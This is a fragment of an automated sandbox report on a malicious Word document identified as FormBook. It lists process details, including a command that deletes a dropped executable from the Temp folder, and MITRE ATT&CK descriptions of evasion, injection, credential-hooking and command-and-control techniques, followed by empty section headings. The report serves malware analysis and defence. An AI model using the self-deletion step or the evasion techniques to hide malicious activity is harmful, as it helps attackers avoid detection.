Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'
Imagebase:	0x4a650000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report QUOTATION1100630004R2.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations